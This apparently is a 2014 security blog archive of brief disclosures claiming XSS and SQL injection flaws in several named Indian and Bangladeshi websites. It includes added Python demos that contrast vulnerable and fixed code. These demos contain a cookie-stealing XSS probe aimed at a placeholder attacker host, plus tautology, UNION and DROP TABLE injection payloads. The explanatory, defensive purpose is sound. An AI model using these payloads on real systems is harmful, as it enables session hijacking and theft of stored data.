Thursday, July 3, 2014

Snapdeal is vulnerable to XSS (Reflected)

Snapdeal.com is an online marketplace, headquartered in New Delhi, India. The company was started in February 2010 by Kunal Bahl, a Wharton graduate as part of the dual degree M&T Engineering and Business program at Penn, and Rohit Bansal, an alumnus of IIT Delhi. Snapdeal.com was started as a daily deals platform but expanded in September 2011 to become an e-commerce company via a marketplace model. With 20 million registered users, Snapdeal is one of the first and largest online marketplaces in India, offering an assortment of 4 million+ products across diverse categories from over 20,000 sellers, shipping to 4,000 towns and cities in India.

Further, on testing I found an XSS vulnerability in m.snapdeal.com

Affected URL:

Saturday, May 10, 2014

Bangladesh Railways is vulnerable to XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used by that site.
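The reflected XSS pattern described above (and reported against m.snapdeal.com in the post further up) can be shown in a few lines. The following is an added illustration, not code from this blog or from any of the sites named here: a search page that echoes the user's query string back into the HTML. The function names, the page markup and the two sample inputs (a benign term and a cookie-stealing probe pointing at a placeholder attacker host) are constructed for the example.

```python
import html
import re

# Constructed sample inputs (not taken from the page): a benign search
# term and a classic reflected-XSS probe aimed at a placeholder host.
BENIGN_QUERY = "diamond ring"
XSS_PROBE = ('<script>document.location="http://attacker.example/?c="'
             '+document.cookie</script>')


def render_search_vulnerable(query: str) -> str:
    """Reflects the user's search term into the page without encoding.

    This is the flaw the XSS description above warns about: user input
    is placed straight into the generated HTML, so a <script> tag in the
    query string becomes real markup in the victim's browser.
    """
    return f"<html><body><h2>Results for: {query}</h2></body></html>"


def render_search_hardened(query: str) -> str:
    """Same page, with the search term HTML-encoded before it is reflected.

    html.escape(quote=True) turns & < > " ' into entities, so the browser
    renders the probe as visible text instead of executing it.
    """
    safe = html.escape(query, quote=True)
    return f"<html><body><h2>Results for: {safe}</h2></body></html>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def reflects_active_script(page: str) -> bool:
    """Crude check a tester runs on the response body: does a raw <script
    tag survive in the output?  Browsers parse HTML far more liberally than
    this regex, so it is a demo heuristic, not a general XSS detector."""
    return _SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    for label, render in (("vulnerable", render_search_vulnerable),
                          ("hardened", render_search_hardened)):
        page = render(XSS_PROBE)
        print(f"{label}: active script reflected = {reflects_active_script(page)}")
        print("    ", page)
```

Output encoding is context-dependent: `html.escape` is the right tool for text between tags and inside quoted attributes, but a value placed inside a `<script>` block, a URL, or an unquoted attribute needs encoding for that context instead. Encoding on output is also what fixes the flaw; input "validation" alone does not, because legitimate data can contain `<` and `&`.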



Tuesday, April 15, 2014

PC Jeweller is vulnerable to SQL injection

PC Jeweller started operations in April 2005 with one showroom at Karol Bagh, Delhi. It is a first generation business promoted by two brothers, Sh Padam Chand Gupta and Sh Balram Garg. The company, however, had a vision of expanding its presence in the retail segment.

The company's business model consists of opening large format, stand alone stores at high street locations. Its stores stock a wide range of jewellery across all price points, with an increasing focus on diamond jewellery. The company sells only hallmarked jewellery and certified diamond jewellery. This assurance on quality and purity, along with transparent and customer friendly policies, has enabled PCJ to become an established and trusted brand name in a short time span.

It has accordingly been opening showrooms at regular intervals and today has a strength of 41 stores spread over 33 cities.

The most valued asset is its relationship with clients, which has been built over years by giving certified quality, latest designs, transparency in dealings and best personalized customer service. It also carries out proactive and timely research and creation of world class jewellery, and guides its customers to enable them to take correct purchase decisions.

The company is confident that its thrust on diamond and other high margin jewellery, along with customer oriented marketing initiatives, would continue to help grow its top line as well as the bottom line.

Mr. Padam Chand Gupta, Chairman of the Company, has over three decades of experience in jewellery.

Mr. Balram Garg, Managing Director of the Company, can easily be called the goodwill ambassador of this group. A man of clear vision and strong decisions, Mr. Garg's approach in business rests on his belief that nothing is impossible.


Ok, further on testing I found an SQL injection vulnerability in it.



Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
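The injection flaw described above, which is also the class of bug reported against PC Jeweller here and against APGVB in the post below, comes down to untrusted text being spliced into SQL. The following is an added example and is not code from this blog or from either site: a user lookup written two ways against a throwaway in-memory SQLite database. The table, the two rows in it, the function names and the two payloads are constructed for the illustration; the payloads are the generic tautology and UNION probes an assessor tries first, not anything taken from the affected sites.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data (not from the page): a throwaway in-memory
    database standing in for an application's real user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", "hash-of-admin-pw"), ("alice", "hash-of-alice-pw")],
    )
    conn.commit()
    return conn


def lookup_user_vulnerable(conn: sqlite3.Connection, username: str):
    """Builds the statement by string concatenation.  The untrusted value
    becomes part of the SQL text, so quotes in it change the query's
    structure: this is the injection flaw described above."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_user_parameterized(conn: sqlite3.Connection, username: str):
    """Sends the statement and the value separately.  The driver binds the
    value as data, so it can never alter the statement, whatever it contains."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Generic probes an assessor would try in a login or search field.
# Tautology: closes the string literal and makes the WHERE clause always true.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"
# UNION: appends a second SELECT with the same column count to pull other
# columns (here the password hashes) into the result; "--" comments out the
# trailing quote left by the original query.
UNION_PAYLOAD = "' UNION SELECT id, password_hash FROM users --"


if __name__ == "__main__":
    conn = build_demo_db()
    for name, payload in (("tautology", TAUTOLOGY_PAYLOAD), ("union", UNION_PAYLOAD)):
        print(f"{name} payload: {payload!r}")
        print("  vulnerable    ->", lookup_user_vulnerable(conn, payload))
        print("  parameterized ->", lookup_user_parameterized(conn, payload))
```

With the tautology payload the concatenated query returns every user, and with the UNION payload it returns the password hashes; the parameterized version returns nothing for either, because the whole payload is compared as a literal username. Python's `sqlite3.execute` refuses stacked statements, so the classic `'; DROP TABLE users; --` does not work against this particular driver, but that is a property of the driver, not a defence: the fix is parameterization (or an ORM that does it for you) everywhere untrusted data meets a query.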

Monday, April 14, 2014

Andhra Pradesh Grameena Vikas Bank is vulnerable to SQL injection

APGVB Formation



APGVB was formed by amalgamation, on 31st March 2006, of the following 5 banks sponsored by SBI, to participate more energetically, with synergy, in the uplift and development of the Rural Farm Sector and Rural Non-Farm Sector, with emphasis on the deprived, the Rural Poor, Rural ISB and Rural Crafts.

Further, on testing I found a vulnerability in http://www.apgvbank.in


Hope they will patch the vulnerability as soon as possible.






Regards: Anshuman Kak